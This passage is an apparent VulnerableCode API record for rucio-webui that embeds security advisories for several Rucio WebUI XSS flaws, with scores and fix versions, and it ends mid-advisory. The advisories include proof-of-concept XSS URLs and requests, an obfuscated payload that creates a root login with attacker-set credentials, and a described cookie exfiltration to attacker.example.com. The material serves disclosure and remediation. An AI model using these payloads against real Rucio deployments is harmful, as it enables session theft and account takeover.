{"url":"http://public2.vulnerablecode.io/api/packages/935620?format=json","purl":"pkg:pypi/rucio-webui@1.25.3.post2","type":"pypi","namespace":"","name":"rucio-webui","version":"1.25.3.post2","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"35.8.3","latest_non_vulnerable_version":"39.3.1","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20271?format=json","vulnerability_id":"VCID-4n93-tux7-zubk","summary":"Rucio WebUI has a Reflected Cross-site Scripting Vulnerability\n### Summary\nA reflected Cross-site Scripting vulnerability was located in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL.\n\n#### Details\nThe WebUI error message renders `ExceptionMessage` (which can contain user-controlled input) as unencoded HTML. Server code that produces the message is in `common.py` - specifically `error_headers -> _error_response -> generate_http_error_flask`, which places `ExceptionMessage` into both response headers and the JSON body. The WebUI client then injects that text into the DOM using unsafe methods (examples in `lib/rucio/web/ui/static/*.js` such as `rule.js`, `request_rule.js`, `list_rules.js`) with `jQuery.html(...)` or equivalent, enabling reflected XSS when an attacker-controlled value is included in an error message (e.g. 
account, attribute, scope).\n\n### PoC\n1) Reflected XSS via account parameter (browse or load URL in WebUI context):\n```text\nhttps://127.0.0.1:8443/ui/account_rse_usage?account=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E\n```\nServer response (excerpt):\n```http\nHTTP/1.1 500 INTERNAL SERVER ERROR\nExceptionClass: AccountNotFound\nExceptionMessage: Account <img src=x onerror=alert(document.cookie)> does not exist\nContent-Type: application/octet-stream\n\n{\"ExceptionClass\":\"AccountNotFound\",\"ExceptionMessage\":\"Account <img src=x onerror=alert(document.cookie)> does not exist\"}\n```\n\n**XSS payload triggering (Displaying session token) when browsing to crafted URL**\n<img width=\"1210\" height=\"510\" alt=\"XSS payload triggering (Displaying session token) when browsing to crafted URL\" src=\"https://github.com/user-attachments/assets/989a0aed-628d-4f1c-bbfb-de434dab8af6\" />\n\nWhen the WebUI inserts `ExceptionMessage` into the page with `.html(...)`, the injected <img onerror=...> executes and displays the users' session tokens. 
Note that this is a PoC only, an attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\n2) Reflected XSS via account key attribute creation error:\n```http\nPOST /proxy/accounts/pentest/attr/XSS HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nOrigin: https://127.0.0.1:8443\nX-Rucio-Script: webui::-ui-account\n{\"key\":\"XSS\",\"value\":\"<script>alert(document.cookie)</script>\"}\n```\n\n**XSS payload triggering (Displaying session token) on error when creating account key**\n<img width=\"1322\" height=\"593\" alt=\"XSS payload triggering (Displaying session token) on error when creating account key\" src=\"https://github.com/user-attachments/assets/151cb0ad-e4f0-498e-954e-be3455ca8a72\" />\n\nServer response (excerpt) contains `ExceptionMessage` with the raw `<script>` payload; the WebUI renders it unsafely and script executes. Note that this method is less impactful since it's not something that can be triggered with a URL alone, but is listed to show that this issue affects multiple locations.\n\n### Impact\nAny authenticated WebUI user who follows a crafted link or triggers a request containing attacker-controlled input in a field that causes an error may execute arbitrary JavaScript in the WebUI origin. This vulnerability is more impactful due to the lack of protection of cookies (The Session token does not have HttpOnly attribute) and lack of Content Security Policy that would prevent third-party scripts from loading.\n\nAttackers can steal session cookies/tokens or perform actions as the victim like creating a new UserPass identity with an attacker known password. 
\n\n**Example URL to Create UserPass for Root**\n```\nhttps://localhost:8443/ui/account_rse_usage?account=%3Cimg%20src%3Dx%20onerror%3D(function()%7Bo%3D%7B%7D%3Bo.method%3D'PUT'%3Bo.credentials%3D'include'%3Bo.headers%3D%7B'X-Rucio-Username'%3A'attackeruser'%2C'X-Rucio-Password'%3A'AttackerPassword123'%2C'X-Rucio-Email'%3A'demo%40example.org'%2C'X-Rucio-Auth-Token'%3Atoken%7D%3Bfetch(String.fromCharCode(47)%2B'identities'%2BString.fromCharCode(47)%2B'root'%2BString.fromCharCode(47)%2B'userpass'%2Co)%7D)()%3E\n```\n\n**Account Payload to Create UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n**Creating identity for Root account via reflected XSS**\n<img width=\"1558\" height=\"957\" alt=\"Creating identity for Root account via reflected XSS\" src=\"https://github.com/user-attachments/assets/539bfff4-70f3-42c5-b83a-10b5f85d6d44\" />\n\nAll WebUI users are impacted.\n\n### Remediation / Mitigation\nChange all client-side insertions of server-provided text from `.html(...)` to `.text()` or create text nodes / escape HTML before insertion. Example: replace `$('#elem').html(msg)` with `$('#elem').empty().append($('<span>').text(msg))`.\n\nAdditionally, consider adding a Content Security Policy (CSP) to mitigate external script execution and set the HTTPOnly flag for session cookies. 
Also, the API token should not be set in a JavaScript variable as it can be accessed by an attacker even with the HTTPOnly flag set on the session cookie.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n#### References:\n- Server functions: `common.py` (`error_headers`, `_error_response, generate_http_error_flask`)\n- Example client files to fix: `lib/rucio/web/ui/static/rule.js`, `lib/rucio/web/ui/static/request_rule.js, list_rules.js`\n- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25136","reference_id":"","reference_type":"","scores":[{"value":"0.0008","scoring_system":"epss","scoring_elements":"0.23655","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25136"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id"
:"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q"},{"reference_url":"https://nvd.nist.gov/vul
n/detail/CVE-2026-25136","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25136"},{"reference_url":"https://github.com/advisories/GHSA-h79m-5jjm-jm4q","reference_id":"GHSA-h79m-5jjm-jm4q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h79m-5jjm-jm4q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25136","GHSA-h79m-5jjm-jm4q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4n93-tux7-zubk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19870?format=json","vulnerability_id":"VCID-hme7-m816-77by","summary":"Rucio WebUI has a Stored Cross-site Scripting (XSS) Vulnerability in its Custom RSE Attribute\n### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Custom RSE Attribute of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the 
WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nA stored XSS payload can be introduced via a custom RSE attribute value and is later rendered when the RSE is viewed.\n\n**Create Path**:  \nAdmin > RSE Management > _RSE NAME_ > Add Attribute\n\n**Trigger Path**:  \nAdmin > RSE Management > _RSE NAME_\n\n**Request**\n```http\nPOST /proxy/rses/WEB1/attr/XSS HTTP/1.1\n...\n{\"value\":\"<script>alert('XSS')</script>\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Storing XSS Payload in RSE Attribute**\n<img width=\"1234\" height=\"844\" alt=\"Storing XSS Payload in RSE Attribute\" src=\"https://github.com/user-attachments/assets/d10f58c2-8cea-43a9-bf7f-f94ef3d1fd81\" />\n\n**XSS Payload triggering when viewing RSE**\n<img width=\"1248\" height=\"949\" alt=\"XSS Payload triggering when viewing RSE\" src=\"https://github.com/user-attachments/assets/d536fac2-ab44-4cfb-b669-085a8c3db33e\" />\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. 
Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. 
Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25736","reference_id":"","reference_type":"","scores":[{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25931","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25736"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"ref
erence_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-fq4f-4738-rqxm","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://gith
ub.com/rucio/rucio/security/advisories/GHSA-fq4f-4738-rqxm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25736","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25736"},{"reference_url":"https://github.com/advisories/GHSA-fq4f-4738-rqxm","reference_id":"GHSA-fq4f-4738-rqxm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fq4f-4738-rqxm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25736","GHSA-fq4f-4738-rqxm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hme7-m816-77by"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20459?format=json","vulnerability_id":"VCID-hmz1-rk7c-pucw","summary":"Rucio WebUI Vulnerable to Stored Cross-site Scripting (XSS) through Custom Rule Function\n### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Custom Rules 
function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nA malicious payload supplied in the `comment` field is stored by the backend. When the rule is later viewed or approved, the stored script executes in the WebUI origin.\n\n**Create Path**:  \nMonitoring > Subscriptions and Rules > Request New Rule > Options > Add Comment\n\n**Trigger Paths**:  \n- **User Trigger**: Monitoring > Subscriptions and Rules > Show My Rules > *RULE NAME*  \n  (`https://localhost:8443/ui/rule?rule_id=<RULE_ID>`)\n- **Admin Trigger**: Data Transfer (R2D2) > Approve Rules > *RULE NAME*\n\n**Create Request**\n```http\nPOST /proxy/rules/ HTTP/1.1\n...\n{\"dids\":[{\"scope\":\"test\",\"name\":\"dataset1\"}],\"account\":\"pentest\",\"ask_approval\":true,\"activity\":\"User Subscriptions\",\"rse_expression\":\"WEB1\",\"copies\":1,\"grouping\":\"DATASET\",\"lifetime\":15552000,\"comment\":\"<script>alert(document.cookie)</script>\",\"asynchronous\":false,\"notify\":\"N\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\n[\"c2d675c1979d4549b26eede3531a7e6a\"]\n```\n\n**Creating RSE with XSS payload in comment**\n<img width=\"1032\" height=\"667\" alt=\"Creating RSE with XSS payload in comment\" src=\"https://github.com/user-attachments/assets/00258839-5288-48ed-856c-30cfee19d3c4\" />\n\n**Reviewing rule creation requests**\n<img width=\"1201\" height=\"625\" alt=\"Reviewing rule creation requests\" src=\"https://github.com/user-attachments/assets/1b5fc7af-a664-42dc-a3d4-b00755fe2bd7\" />\n\n**XSS Payload triggering on rule review**\n<img width=\"1197\" height=\"417\" alt=\"XSS Payload triggering on rule review\" src=\"https://github.com/user-attachments/assets/463e843a-1e9e-492e-960f-7d3edac2fd1e\" 
/>\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. 
Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25733","reference_id":"","reference_type":"","scores":[{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19924","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25733"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"7.3","
scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-rwj9-7j48-9f7q","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-rwj9-7j48-9f7q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25733","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25733"},{"reference_url":"https://github.com/advisories/GHSA-rwj9-7j48-9f7q","reference_id":"GHSA-rwj9-7j48-9f7q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"h
ttps://github.com/advisories/GHSA-rwj9-7j48-9f7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25733","GHSA-rwj9-7j48-9f7q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hmz1-rk7c-pucw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19947?format=json","vulnerability_id":"VCID-jtev-r8r4-vfd5","summary":"Rucio WebUI has Stored Cross-site Scripting (XSS) in RSE Metadata\n### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the RSE metadata of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. 
This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nSeveral metadata fields accept arbitrary input which is stored and later rendered unsafely in the WebUI when the RSEs are listed in the RSE Management dashboard.\n\n**Create Path**:  \nAdmin > RSE Management\n\n**Trigger Paths**:  \nAdmin > RSE Management  \nAdmin > RSE Management > _RSE NAME_\n\n**Vulnerable Attributes**:  \nCity, Country_Name, ISP\n\n**Request**\n```http\nPOST /proxy/rses/XSSTEST HTTP/1.1\n...\n{\"city\":\"<script>alert('CITY XSS')</script>\",\"country_name\":\"<script>alert('COUNTRY XSS')</script>\",\"ISP\":\"<script>alert('ISP XSS')</script>\",\"deterministic\":false,\"volatile\":false,\"staging_area\":false}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Stored XSS payload triggering in RSE listing after adding XSS payload in metadata**\n<img width=\"1252\" height=\"624\" alt=\"Stored XSS payload triggering in RSE listing after adding XSS payload in metadata\" src=\"https://github.com/user-attachments/assets/6546fc95-0c81-4db7-9271-37b5d4bc8f47\" />\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. 
